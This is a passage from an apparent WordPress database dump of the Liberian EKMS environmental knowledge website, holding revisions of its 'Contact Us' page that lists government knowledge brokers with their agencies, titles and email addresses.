https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:46:45','2022-09-20 10:46:45','',80,'https://ekmsliberia.info/?p=5090',0,'revision','',0),(5091,42,'2022-09-20 10:54:17','2022-09-20 10:54:17','','wonpue','','inherit','open','closed','','wonpue','','','2022-09-20 10:54:17','2022-09-20 10:54:17','',80,'https://ekmsliberia.info/wp-content/uploads/2022/09/wonpue.jpg',0,'attachment','image/jpeg',0),(5093,42,'2022-09-20 10:59:37','2022-09-20 10:59:37','','nadine','','inherit','open','closed','','nadine','','','2022-09-20 10:59:37','2022-09-20 10:59:37','',80,'https://ekmsliberia.info/wp-content/uploads/2022/09/nadine.jpg',0,'attachment','image/jpeg',0),(5094,42,'2022-09-20 10:59:47','2022-09-20 10:59:47','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer<br />UNCBD Focal Point<br />EPA<br /><a href=\"&quot;mailto:jcammue@epa.gov.lr\">jcammue@epa.gov.lr</a></p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator<br />UNFCCC Focal Point<br />EPA<br /><a>bkarmorh@epa.gov.lr</a></p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator<br />UNCCD Focal Point<br />EPA<br /><a>bjallah@epa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><p><strong>John K. Jallah</strong><br />Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:jjallah@epa.gov.lr\">jjallah@epa.gov.lr</a></p><p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/konikay.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/konikay-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/bgoll-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konikay Nimely BSc, MSc.</strong><br />EIA Manager<br />FDA<br /><a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a></p><p><strong>Edward S. Kamara</strong><br />Marketing and Forest Forecast<br />FDA<br /><a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a></p><p><strong>Blamah Goll BSc, MSc.</strong><br />Technical Manager Conservation Department<br />FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/duolupeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/jwiagbe-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Joseph G. Duolupeh BSc, MPSM.</strong><br />Manager, Strategic Planning Unit<br />FDA<br /><a href=\"mailto:jduolupeh@gmail.com\">jduolupeh@gmail.com</a></p><p><strong>Francis W. Mwah</strong><br />Agricultural Economist<br />MOA<br /><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><p><strong>Jlopleh Dennis Wiagbe </strong><br />Director/M&amp;E<br />MOA<br /><a href=\"mailto:jdmne12@gmail.com\">jdmne12@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/Halala.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/Halala-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/reeves.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/reeves-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/willabo.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/willabo-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Halala Willie Kokulo </strong><br />Director/Crop Resources<br />MOA<br /><a href=\"mailto:kokulohalala@gmail.com\">kokulohalala@gmail.com</a></p><p><strong>Roosevelt Carlos Reeves </strong><br />Agricultural Mechanization Technologist<br />MOA<br /><a href=\"mailto:rcreeves@gmail.com\">rcreeves@gmail.com</a></p><p><strong>John Willabo Johnson </strong><br />Assistant Minister<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/kullie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/kullie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2022/09/ernest.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-300x279.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2022/09/ernest-600x559.jpg 600w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Anthony Kullie</strong><br />Director of LHS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Ernest M. Menseah </strong><br />Director of LGS<br />MME<br /><a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a></p><p><strong>Wonpue Quellian </strong><br />Research Officer<br />MME<br /><a href=\"mailto:wonpuequellian2017@gmail.com\">wonpuequellian2017@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Uriah Garsinii </strong><br />Land Use Management Manager<br />LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />														\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />														\n		<p><strong>Aaron S.M. Wesseh</strong><br />Manager<br />Cross-Cutting Capacity Development Project<br />EPA<br /><a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a></p><p><strong>Jesse Mathies</strong><br />Assistant Director<br />Division of Foreign Trade<br />MOCI<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer<br />National Standard Laboratory<br />MOCI<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards<br />Bureau of Industrial Services<br />MOCI<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer<br />Division of Knowledge Management &amp; Archive<br />MOCI<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>S. Ahmed Sheriff </strong><br />Director<br />Department of Marine Fisheries and Environment<br />NaFAA<br /><a href=\"sasherif@nafaa.gov.lr\">sasherif@nafaa.gov.lr</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/02/nafaa-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<strong>Anthony A. Yokie</strong>\n</br>\nManager\n</br>\nDepartment of Marine Fisheries and Environment\n</br>\nNaFAA\n</br>\n<a href=\"mailto:ayokie@nafaa.gov.lr\">ayokie@nafaa.gov.lr</a><p><strong>Joyce W. Kumeh</strong><br />Coastal Zone Supervisor<br />NaFAA<br /><a href=\"mailto:jkumeh@nafaa.gov.lr\">jkumeh@nafaa.gov.lr</a></p><p><strong>Urias B. Barclay</strong><br />Environmental Technician<br />NaFAA<br /><a href=\"mailto:ubbarclay@gmail.com\">ubbarclay@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director<br />Department of Marine Environmental Protection<br />LIMA<br /><a href=\"&quot;mailto:stephenlavalah@yahoo.com\">stephenlavalah@yahoo.com</a></p><p><strong>Nadine Ajamia</strong><br />Policy Officer<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer<br />Department of Marine Environmental Protection<br />LIMA</p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/sherman.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/sherman-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/borbor.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/borbor-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Konah Kaliku</strong><br />Environmental Inspector<br />Department of Marine Environmental Protection<br />LIMA</p><p><strong>Albert M. Sherman </strong><br />MOT<br /><a href=\"mailto:itssherman@gmail.com\">itssherman@gmail.com</a></p><p><strong>Amos Borbor </strong><br />Finance &amp; Administrative Officer<br />MOT<br /><a href=\"mailto:felixborbor@gmail.com\">felixborbor@gmail.com</a></p>		\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/simpson.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/simpson-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>Henry A. Simpson </strong><br />Weather Forecaster<br />MOT<br /><a href=\"mailto:ransford2024@gmail.com\">ransford2024@gmail.com</a></p><p><strong>James Kollie </strong><br />MOT<br /><a href=\"mailto:jameskollie@yahoo.com\">jameskollie@yahoo.com</a></p><p><strong>Eric Pervist </strong><br />MGCSP<br /><a href=\"mailto:gendermedia1@gmail.com\">gendermedia1@gmail.com</a></p>		\n												<img src=\"https://ekmsliberia.info/wp-content/plugins/elementor/assets/images/placeholder.png\" title=\"\" alt=\"\" />														\n												<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/03/domah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/03/domah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />														\n		<p><strong>N. Mamatu G. King </strong><br />MGCSP<br /><a href=\"mailto:kingmamatu@gmail.com\">kingmamatu@gmail.com</a></p><p><strong>J. Josiah N. Domah </strong><br />Administrative Assistant, Office of the Minister<br />MGCSP<br /><a href=\"mailto:josiahdomah@@gmail.com\">josiahdomah@gmail.com</a></p><p><strong>Emmanuel G. Ballah </strong><br />MGCSP<br /><a href=\"mailto:emmanuelgballah_@gmail.com\">emmanuelgballah_@gmail.com</a></p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2022-09-20 10:59:47','2022-09-20 10:59:47','',80,'https://ekmsliberia.info/?p=5094',0,'revision','',0),(5095,42,'2022-09-20 10:59:48','2022-09-20 10:59:48','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n									<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener\">\n							<img 